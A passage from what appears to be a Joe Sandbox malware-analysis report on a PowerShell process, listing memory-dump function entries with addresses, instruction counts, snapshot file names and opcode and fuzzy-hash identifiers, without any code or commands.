                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Tefq
                                                                                      • API String ID: 0-1066582953
                                                                                      • Opcode ID: f447caebcc7967a321fc81cec6ce0c36c1803b1245d855328e5d68cfb1277a94
                                                                                      • Instruction ID: 7cd5c574a63b2fef39e76ca7135dc8bdcabd2e66b90c74ba620b23cd061b790d
                                                                                      • Opcode Fuzzy Hash: f447caebcc7967a321fc81cec6ce0c36c1803b1245d855328e5d68cfb1277a94
                                                                                      • Instruction Fuzzy Hash: 23F01778D5525ACFDB61CFA4DC94BEABBB1FB09300F1040E68819A7741EA305E89DF40
                                                                                      Function 06F672E5 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /
                                                                                      • API String ID: 0-2043925204
                                                                                      • Opcode ID: 1463a11c09814f1f592c63ee8f10343e7e122d63c3a42e1a502438f81a89852b
                                                                                      • Instruction ID: e2de2ada49694f1fe0c6008c8660f0ca9139e640c763bfa938754b398d714189
                                                                                      • Opcode Fuzzy Hash: 1463a11c09814f1f592c63ee8f10343e7e122d63c3a42e1a502438f81a89852b
                                                                                      • Instruction Fuzzy Hash: DBF0F838904219CFDB50DF60C888BADBBB2FB44308F5480A99419A7391CB359E86DF40
                                                                                      Function 06F46F91 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Tefq
                                                                                      • API String ID: 0-1066582953
                                                                                      • Opcode ID: 1e3a14d02c782c7dd384ce3871e12dfc240003a9d727ea0bb776a2222dbcdab8
                                                                                      • Instruction ID: d7b998e31351285c455772870e66e498cf3b15118ddf73bc97db5b82750964db
                                                                                      • Opcode Fuzzy Hash: 1e3a14d02c782c7dd384ce3871e12dfc240003a9d727ea0bb776a2222dbcdab8
                                                                                      • Instruction Fuzzy Hash: BBF0F874D4021ACFEB64DF68DC80BEEBBB2AB49310F1040A98819A7780EB305D85DF50
                                                                                      Function 073DC0EB Relevance: .8, Instructions: 772COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3331e1fbf5a3378fa5da28b20db1440a08ea56b181179b0d056e72a59836a688
                                                                                      • Instruction ID: f92e18176d1f89b226f32079cf9199261fd9b54616ba28411014b41b54ea3cf3
                                                                                      • Opcode Fuzzy Hash: 3331e1fbf5a3378fa5da28b20db1440a08ea56b181179b0d056e72a59836a688
                                                                                      • Instruction Fuzzy Hash: C6724BB5B102149FEB54CB58C850B69B7A2FF89308F14C099D90DAB751CB72ED82CF91
                                                                                      Function 08160048 Relevance: .6, Instructions: 605COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2623383395.0000000008160000.00000040.00000800.00020000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_8160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 90f22cd5362815a62e6293dddbc47494de4053834608f336d3cce50cf04375f1
                                                                                      • Instruction ID: ac12d6d066615424230afd078fb7ea89353593102b1e000f85dedcafb6d7ae53
                                                                                      • Opcode Fuzzy Hash: 90f22cd5362815a62e6293dddbc47494de4053834608f336d3cce50cf04375f1
                                                                                      • Instruction Fuzzy Hash: C312F831700605DFCB14DF69C4406AABBF6EFC9322F14806ED585AB291DB72D8A6C7A1
                                                                                      Function 0455D828 Relevance: .3, Instructions: 335COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2537144071.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_4550000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3c44fbf10fac02f44cf62b61efc57d835ec077a83ab6df077d1f851e0491f6e1
                                                                                      • Instruction ID: 6c62b62e8bbb32776b90b42700073ebcc52496d4b35e4a152665f7e2df78b04b
                                                                                      • Opcode Fuzzy Hash: 3c44fbf10fac02f44cf62b61efc57d835ec077a83ab6df077d1f851e0491f6e1
                                                                                      • Instruction Fuzzy Hash: 66E10A75A052199FCB04CF98D494AAEFBB2FF48310F14C15AE804AB361D731ED85DB90
                                                                                      Function 0455E108 Relevance: .3, Instructions: 330COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2537144071.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_4550000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b48db09cb78415af1435e0f31c3f8e8e30661b5a73d5eed144de8a380968360d
                                                                                      • Instruction ID: 9bb58fbf3a1fac5fa89ff345a0e53c704f9753b35bd020f3adf374d5c37f1c52
                                                                                      • Opcode Fuzzy Hash: b48db09cb78415af1435e0f31c3f8e8e30661b5a73d5eed144de8a380968360d
                                                                                      • Instruction Fuzzy Hash: A5D14B74A01218DFCB04DFA8D595AADBBB2FF48314F248556E815AB361CB30FD46DB90
                                                                                      Function 04552AB0 Relevance: .3, Instructions: 299COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2537144071.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_4550000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3c1fcab2119e05f970c6fd091c6f2020a071818a0a4cbd5fd57d8b529ff7232c
                                                                                      • Instruction ID: 0a009299cbe48e4af6fba1859baf613b0235fdbab287dff35fd7186dd81534e2
                                                                                      • Opcode Fuzzy Hash: 3c1fcab2119e05f970c6fd091c6f2020a071818a0a4cbd5fd57d8b529ff7232c
                                                                                      • Instruction Fuzzy Hash: AFC16B74A006099FCB05CF99C4949BEBBB1FF48310B25869AE955AB3A5C735FC41CFA0
                                                                                      Function 073D8AE8 Relevance: .2, Instructions: 196COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fc02e38fce662624a9c90ca93b914a4d2d9893e6064c33a15a7cd7ac5d65f14d
                                                                                      • Instruction ID: a21a0d863452acb6ba41f93a914439ea745bbde0fc761a12e0558577fe391f28
                                                                                      • Opcode Fuzzy Hash: fc02e38fce662624a9c90ca93b914a4d2d9893e6064c33a15a7cd7ac5d65f14d
                                                                                      • Instruction Fuzzy Hash: A45108F2700305DBDB245E69A4506ABFBAAEFC5314F24847AD449D7681DB31EC81C791
                                                                                      Function 08160000 Relevance: .2, Instructions: 152COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2623383395.0000000008160000.00000040.00000800.00020000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_8160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9d54f2e8423266e112357a3a8e1eb66d99c86a0b6331a566fc159d7a172a81f5
                                                                                      • Instruction ID: f147908c19a89595bc1d466d125418a56b9e54247b0d4a878f40130c619312a3
                                                                                      • Opcode Fuzzy Hash: 9d54f2e8423266e112357a3a8e1eb66d99c86a0b6331a566fc159d7a172a81f5
                                                                                      • Instruction Fuzzy Hash: D451C530604640DFDB16CF24C5549697BB2AF86325F1980AED884AF2A2C731ECA6CB61
                                                                                      Function 0455D78A Relevance: .1, Instructions: 146COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2537144071.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_4550000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5645c70bfc9b0276942f224dd99918c05e38a4fb89644db84829c23e8448ba51
                                                                                      • Instruction ID: 5a40799b9038f53d1c9cd4b892037be50268248a729c89b6aadfc85aa7d7d858
                                                                                      • Opcode Fuzzy Hash: 5645c70bfc9b0276942f224dd99918c05e38a4fb89644db84829c23e8448ba51
                                                                                      • Instruction Fuzzy Hash: F851C4B59097819FC702DF68D8A49D9BFB0FF4A314B098197D484DB2A3CB34AD46C7A1
                                                                                      Function 06F68037 Relevance: .1, Instructions: 136COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 585d3ceb8b8499c570f2c70c7bd79460c50f46b6881c1aa53de34b78170a4296
                                                                                      • Instruction ID: 9c2f7305555a18a1820fdaaf9d3a1c602062788f118d9319f373b4f8f65300d7
                                                                                      • Opcode Fuzzy Hash: 585d3ceb8b8499c570f2c70c7bd79460c50f46b6881c1aa53de34b78170a4296
                                                                                      • Instruction Fuzzy Hash: 3F41E736C0768A7ADB714A768D01B9ABFD89F022A4F246F5DFDF0661D2D7204581C6F0
                                                                                      Function 08166575 Relevance: .1, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2623383395.0000000008160000.00000040.00000800.00020000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_8160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1474f79d00973cc5ad3d1ec888c0121ff41329e18872b99dd23769003cc7b8c3
                                                                                      • Instruction ID: 66e5e9b7b5785e819dee6cbeab6f39480a0775e36c275bb4377c4b24f1dcf53b
                                                                                      • Opcode Fuzzy Hash: 1474f79d00973cc5ad3d1ec888c0121ff41329e18872b99dd23769003cc7b8c3
                                                                                      • Instruction Fuzzy Hash: 0741D0707001049FDB04DF6DC550AAE7BE7AFD8325F658468E805AF381CB31EC128BA5
                                                                                      Function 0455D2B9 Relevance: .1, Instructions: 120COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2537144071.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_4550000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b9c2b7cb98e40d8df79a42f533539b254449c91782c8378d4b13b1653120a786
                                                                                      • Instruction ID: c2442e4d8bccfafad1acda895665a14862c249fd61fca21217a98f90d09e0fe0
                                                                                      • Opcode Fuzzy Hash: b9c2b7cb98e40d8df79a42f533539b254449c91782c8378d4b13b1653120a786
                                                                                      • Instruction Fuzzy Hash: A051D975A012089FDB14CFA8D494AADFBF2BF88314F24C559E804AB365C735EC86DB90
                                                                                      Function 04552CA8 Relevance: .1, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2537144071.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_4550000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ad9828f0585128698c509a44f860511e0129787ca9fb1564b576333cdedab915
                                                                                      • Instruction ID: 7a0d9eb6be8b27320226ba91d725108769368c80235a37b3cce8ecf035841ec6
                                                                                      • Opcode Fuzzy Hash: ad9828f0585128698c509a44f860511e0129787ca9fb1564b576333cdedab915
                                                                                      • Instruction Fuzzy Hash: 1D410574A005059FCB05CF99D4A49BEBBB1FF48310B25869AE905AB3A4C731FC51DF94
                                                                                      Function 06F6A46F Relevance: .1, Instructions: 108COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 62538d74c2b660dacedf934e8b08c0f313db84cd05c6198b8502b5ffad09ff7b
                                                                                      • Instruction ID: 81d2c452db55de56d5c3921e7a3dbba7fa6f8df92694900ef4c1096d59fbcba3
                                                                                      • Opcode Fuzzy Hash: 62538d74c2b660dacedf934e8b08c0f313db84cd05c6198b8502b5ffad09ff7b
                                                                                      • Instruction Fuzzy Hash: CC416671E052099FEB44CFAAC885AEEBBF2FB89300F10806AE405F7251DB745944CFA1
                                                                                      Function 06F6D588 Relevance: .1, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 79557fc63f05b0cb321de339368f85b81b1837817648cdf1817ac790082e5632
                                                                                      • Instruction ID: 8cfa3a6b863376ad270429e90ed021732c7c68b7ee5044b688a565f0072b5d8a
                                                                                      • Opcode Fuzzy Hash: 79557fc63f05b0cb321de339368f85b81b1837817648cdf1817ac790082e5632
                                                                                      • Instruction Fuzzy Hash: F83167A291E3E05FD787AB788CB00D53F709E13214B0A00C7D4C5CF1A3E96A4A09D7A6
                                                                                      Function 081665B0 Relevance: .1, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2623383395.0000000008160000.00000040.00000800.00020000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_8160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d666571306777eea06b0311bddd10866fdc74f17515c41a70d7129278e9f8851
                                                                                      • Instruction ID: f65c32326bf636e7bf519aa1f7cbf0f36c448562c421e5684640d86e192e7426
                                                                                      • Opcode Fuzzy Hash: d666571306777eea06b0311bddd10866fdc74f17515c41a70d7129278e9f8851
                                                                                      • Instruction Fuzzy Hash: 9341AD74700104AFDB08DF59D48099EBBE6BFD8325F258459E805AF351CB31EC228BA5
                                                                                      Function 06F47868 Relevance: .1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a37c53f61076f39fd0b6ddd23e7990552d4d00329402d241a114af9b3624b5ca
                                                                                      • Instruction ID: 205163cacf7fb43c454dbf1fdbe0dcf62fa3ba9a4cf68ab51d29e81382884b6a
                                                                                      • Opcode Fuzzy Hash: a37c53f61076f39fd0b6ddd23e7990552d4d00329402d241a114af9b3624b5ca
                                                                                      • Instruction Fuzzy Hash: 44410874E05109CFEB44EFA9C8816EEBBF6EB89300F24C469D805A7755DB345946CF90
                                                                                      Function 06F69D70 Relevance: .1, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d26633a8cb6670f8e137a1f179401f3fa3524af5bc3dc3409833e625cd9ff038
                                                                                      • Instruction ID: d008f0576bc55cba128a0065292501007f769a1f4e8a021e4176c03e05afbbf8
                                                                                      • Opcode Fuzzy Hash: d26633a8cb6670f8e137a1f179401f3fa3524af5bc3dc3409833e625cd9ff038
                                                                                      • Instruction Fuzzy Hash: 6C41FB75E012099FDB44DFA9D885ADDBBF5FF89310F108026E905AB360DB749941CF91
                                                                                      Function 06F693DE Relevance: .1, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c619834249b33c417bcc583fbd7b77dca7ffba1cffcdd3eef5b710d63b5a925e
                                                                                      • Instruction ID: 8d3b34a789050ae1db602c3aaaa0bc1185da65d2b324bca5928a51d4102dbe7f
                                                                                      • Opcode Fuzzy Hash: c619834249b33c417bcc583fbd7b77dca7ffba1cffcdd3eef5b710d63b5a925e
                                                                                      • Instruction Fuzzy Hash: 7941A374D05219CFEB64CF69C944BADBBF1EB48304F5080AAE409A7351DB755E85CF50
                                                                                      Function 06F6851B Relevance: .1, Instructions: 95COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f2449e9361f55b4f901fa119ea23be902dacba70454fe83a5b6d1d3c680e6aed
                                                                                      • Instruction ID: de2ffecf5d7a3f6552785cbc54a573e4b49222de00538cc60b4fac2e1aa053fa
                                                                                      • Opcode Fuzzy Hash: f2449e9361f55b4f901fa119ea23be902dacba70454fe83a5b6d1d3c680e6aed
                                                                                      • Instruction Fuzzy Hash: 0D41C075E016188FEB64CF59C950BD9BBF5BB89300F5081EAE64DA7350DB34AA84CF90
                                                                                      Function 06F47878 Relevance: .1, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8c34764848967177ea9a660cc8784ceb0035995a396a4a7490ec2cce18b6420a
                                                                                      • Instruction ID: cdd8f3a473f49865de77bd1ecebb2e312cfc02af0222b6027d535e71ebd9ede6
                                                                                      • Opcode Fuzzy Hash: 8c34764848967177ea9a660cc8784ceb0035995a396a4a7490ec2cce18b6420a
                                                                                      • Instruction Fuzzy Hash: 06310774E04109CFEB44EFAAC841AEEBBF6AB89300F20C429E405B7744DB345942CF91
                                                                                      Function 06F691A4 Relevance: .1, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1fd8dab8155cb5adb3656b26c8d2d93da2dcbe45be90251a1ddd4811e6701a2b
                                                                                      • Instruction ID: 49e03b737cda0fccb25f181911814be646f23cd7625b569db413794c3cda46c5
                                                                                      • Opcode Fuzzy Hash: 1fd8dab8155cb5adb3656b26c8d2d93da2dcbe45be90251a1ddd4811e6701a2b
                                                                                      • Instruction Fuzzy Hash: EF41C274E05219CFEB64CF69C984B9DBBF2EB48304F5080AAE409A7351DB749E85CF50
                                                                                      Function 06F69D80 Relevance: .1, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1f02929b0e76516b46a4eec54276d2224c9deb81500f23ba840f6a54729b8195
                                                                                      • Instruction ID: 59886843f4cc17e7dd11530b3aedefda8360c33911999461d4b7c1b95e9ac848
                                                                                      • Opcode Fuzzy Hash: 1f02929b0e76516b46a4eec54276d2224c9deb81500f23ba840f6a54729b8195
                                                                                      • Instruction Fuzzy Hash: 6E41A775E012099FDB44CF99D485AEEBBF6FF88310F10802AE905A7360DB74A941CF90
                                                                                      Function 06F461F8 Relevance: .1, Instructions: 89COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2c67cd8a4830439a72c486a6d78d733e224bbc519ab026d7a020187ea188e0fc
                                                                                      • Instruction ID: 69a8b85f51ed2407fd9b298140fd13357c39699242b4f69739f00a8e6740b9ec
                                                                                      • Opcode Fuzzy Hash: 2c67cd8a4830439a72c486a6d78d733e224bbc519ab026d7a020187ea188e0fc
                                                                                      • Instruction Fuzzy Hash: 743117B5E002089FDF05DFA5D480AEEBBB2AF89310F14806AD415AB3A4DF355945CFA0
                                                                                      Function 06F6A4A0 Relevance: .1, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4f139cca73ca67836109641ffcc1f24226339644609baccadb3497dafcef16fd
                                                                                      • Instruction ID: 57165c82dfaba3a3d1af1e04a81ecffdd39f70ab3b0a4ee70b468049912cd9cb
                                                                                      • Opcode Fuzzy Hash: 4f139cca73ca67836109641ffcc1f24226339644609baccadb3497dafcef16fd
                                                                                      • Instruction Fuzzy Hash: 9F311775E012099FEB44CFAAD885AEEBBF6BB89300F10802AE409F7350DB745944CF91
                                                                                      Function 06F4677A Relevance: .1, Instructions: 87COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 650dbfee7af4bac062b00f742a5221b548b4d2e74110a1f293979d63d304ef88
                                                                                      • Instruction ID: 839bae0f9bf2be59c67a6c59940ae881a172f93ca3afe74fdf8247b0f3878d84
                                                                                      • Opcode Fuzzy Hash: 650dbfee7af4bac062b00f742a5221b548b4d2e74110a1f293979d63d304ef88
                                                                                      • Instruction Fuzzy Hash: 38313570D09219CFEB60EF54D844BA9BBB2BB4A709F5080E9D409E7641DF749E85CF50
                                                                                      Function 06F4DDF0 Relevance: .1, Instructions: 87COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 71e3ec7e08cb221be6ab683a34c8a1e43ad00c2ff94857fadcce6e28a57bb0d1
                                                                                      • Instruction ID: eb8f34028d2d321b12c81e85e8251877d06df873936b596eab9eda287066f502
                                                                                      • Opcode Fuzzy Hash: 71e3ec7e08cb221be6ab683a34c8a1e43ad00c2ff94857fadcce6e28a57bb0d1
                                                                                      • Instruction Fuzzy Hash: A6315630B01305DFDB25AF25D89496ABBB2FF85311B10486DE8568B7A5DF31E846CB90
                                                                                      Function 06F48E5A Relevance: .1, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 25a540cb694efc8dea6a2f5976f6000d4ddef5ac709920da7b046b529c5d708f
                                                                                      • Instruction ID: c28461ca0ebc27bd03ba6a070779c541db7d8b7417c09cbb427adb7ac8318086
                                                                                      • Opcode Fuzzy Hash: 25a540cb694efc8dea6a2f5976f6000d4ddef5ac709920da7b046b529c5d708f
                                                                                      • Instruction Fuzzy Hash: 3A313870D15248DFDB94EFA9D8816EDBFF1EB89300F14C4AAD419A3251DB759A42CF40
                                                                                      Function 06F6A61A Relevance: .1, Instructions: 77COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
